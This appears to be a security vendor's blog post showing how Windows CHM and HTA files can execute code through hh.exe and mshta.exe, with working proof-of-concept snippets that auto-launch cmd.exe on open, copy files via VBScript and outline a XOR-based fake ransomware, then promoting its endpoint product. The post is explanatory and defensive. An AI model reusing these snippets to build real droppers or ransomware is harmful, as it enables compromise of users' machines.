Hide malware through Microsoft HTML interpretors

In this article we will see how Microsoft Compiled HTML Help (CHM) and HTML Application (HTA) can be used to build a malware to compromise a system through legit Microsoft tools.

SAFE chm icon

A CHM file is a binary file containing a collection of HTML pages in order to provide a user guide for a tool or a software. CHM files are interpreted by the program “hh.exe” (C:\Windows\hh.exe or C:\Windows\SysWOW64\hh.exe) which is natively included in Windows since 1994, and still present in Windows 10.

 

SAFE hta iconA HTA file is a program, whose source code is based on HTML provides a web page as a user interface. HTA files are interpreted by an Internet Explorer instance hosted by “mshta.exe” (C:\Windows\System32\mshta.exe or C:\Windows\SysWOW64\mshta.exe). It was introduced in Windows in 1999, and still present in Windows 10.

 

These files are rarely used for legit purposes but can easily be used to damage your system or infect your computer. In fact, both CHM and HTA files are able to interpret VBScript and JScript which may lead to an arbitrary code execution. Let’s see how.

 

Arbitrary code execution using CHM file

Example of a benign file

In order to create a CHM file, we need to download and install HTML Help Workshop.
Then launch the HTML Help Workshop tool, click on New  project  and select an already created directory to hold your project.

SAFE Create hh project

Within the project directory, create a .htm file and add it in your project by clicking on “Add/Remove topic files”.

SAFE Create hh project htm

In the tool, double click on the created htm to edit it, then insert the code below to create a basic Help file:

<html>
<title> SAFE-Cyberdefense </title>
<head>
</head>
<body>
<h2 align=center> CHM Example </h2>
<p><h3 align=center> This is a help file </h3></p>
</body>
</html>

Compile the project by clicking on File → Compile.

SAFE Compile hh project

A CHM file will appear in the project folder. Double click on it to see the result:

SAFE hh example

 

Example of a malicious CHM file

In the following example, we create a button object which starts cmd.exe when it’s clicked. In addition to the object, we also add a script part which will click the button automatically when the document is opened.
The following code will create a CHM file that starts cmd.exe process:

<html>
<title> SAFE-Cyberdefense </title>
<head>
</head>
<body>

<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",cmd.exe">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>

<h2 align=center> CHM Example </h2>
<p><h3 align=center> This is a malicious CHM file </h3></p>
</body>
</html>

When you double click on the chm file a cmd.exe spawns as a child of hh.exe which is the interpretor of the CHM binary file:

SAFE hh procexp

The started process could be a powershell command line that downloads a malicious payload or another tool or malware on the system.

Arbitrary code exeuction using HTA file

Example of a benign HTA file

To implement an HTA file, create a file with the HTA extension and insert your code in it:

<html>
<title> SAFE-Cyberdefense </title>
<head>
</head>
<body>

<h2 align=center> HTA Example </h2>
<p><h3 align=center> This is a help file </h3></p>
</body>
</html>

This time the code is not compiled and mshta.exe will open it directly since it’s the default application associated with .hta files. Double click on the hta file to see the result:

SAFE HTA example

 

Example of a malicious HTA file

For the HTA file we can use this VBScript instead of JScript (this works with CHM as well). The following code sample will create a Wscript object that starts a cmd.exe automatically:

<html>
<title> SAFE-Cyberdefense </title>
<head>
</head>
<body>

<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe"
</script>

<h2 align=center> CHM Example </h2>
<p><h3 align=center> This is a malicious HTA file </h3></p>
</body>
</html>

We can see that mshta.exe started a cmd.exe when the HTML application was opened:

SAFE HTA procexp

Like CHM example, it could be any other executable on the machine or a powershell command with specific parameters to start a malicious payload.

Hide malicious actions behind VBScript

As we saw before, it’s easy to craft a dropper using CHM and HTA files. But since both of them allow us to execute VB and JS scripts, it’s possible to do more and more actions on the system for malicious purposes. As an example, VBScript can be used to read and modify files on the disk. The following code allows to read the content of an existing file (“C:\source_file.txt”) and write it into another file created on desktop:

Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("C:\source_file.txt", 1) 
content = file.ReadAll
file.Close

Set f = fso.CreateTextFile("C:\Users\admin\Desktop\destination_file.txt", True, True)
f.WriteLine(content)
f.Close

Since this type of actions require some ActiveX features, a pop-up is displayed as warning for the user:

SAFE hh ActiveX pop-up

If the pop-up is validated, the read/write operations are done by “hh.exe” on the target file:

SAFE hh access files

With the same code in the HTA no warning appear. The file is read and written by “mshta.exe” without any pop-up:

SAFE hta access files

Thanks to VBScript flexibility, it’s possible to craft a fully standalone ransomware just by adding some cryptographic implementation in the previous sample.
The following code allows to simulate a cryptographic operation to create a fake ransomware:

Function encrypt(content, contentSize, key, keySize)
Dim keyPos, i, newContent
newContent = ""
keyPos = 1
For i = 1 To contentSize
nc = Asc(Mid(content,i,1))
nk = Asc(Mid(key,keyPos,1))
c = nc Xor nk
newContent = newContent + chr(c)
keyPos = keyPos + 1
If keyPos > keySize Then keyPos = 1
Next
encrypt = newContent
End Function

This kind of attacks is actualy not detected by Antivirus since signature detection is hard to match on scripting language. The code can also be obfuscated to make the signature detection more difficult.

No engines detect HTA

VBScript is a powerfull scripting language that also permits to download some data to create a dropper (VBS Download File), or load system DLL to call some Windows API to execute malicious code in memory.

In 2017, some cyberattack are still based on this type of file like the Brazilian Banking Trojan or the Spora Ransomware, but unfortunately Microsoft didn’t announce any security improvement about these HTML interpretors and Antivirus are still weak against this type of malware.

 

How SAFE Endpoint blocks CHM/HTA based attacks

SAFE Endpoint Security is a multi-layer security product which will block this type of attacks or malicious file using multiple methods and at each step of the attack:

  • SAFE Endpoint Security limits the access of some administrative tools (like cmd.exe, powershell.exe, mshta.exe, hh.exe, …)
  • Thanks to the data protection feature, SAFE Endpoint security keeps your data safe by blocking undesirable access to them.
  • Thanks to the security policies, applications and programs have a limited access to the network. This feature allows to prevent droppers or data exfiltration.

In the following video example, the fake ransomware we crafted previously encrypts some personal data. SAFE Endpoint Security is set to detection mode in order to show the different blocked steps of the attack:

SAFE Endpoint Security block HTA malware

 

Conclusion

VBScript interpretors can be dangerous because they give access to Windows objects from web page and allow to launch programs, read/write files and much more behaviors. Like DDE feature, these interpretors (“hh.exe” and “mshta.exe”) are legit tools that are part of the Windows OS, that’s why it is more difficult for a traditionnal Antivirus to catch this kind of attacks. Signature detection softwares can only try to detect the malicious CHM or HTA source code, but since it is HTML based, it can easily be obfuscated to bypass signature detection.
As we saw, SAFE Endpoint Security is able to provide different ways to prevent CHM and HTA based cyberattacks, but as a workaround, it is also possible to limit this type of attacks by setting notepad as a default program to open CHM and HTA files.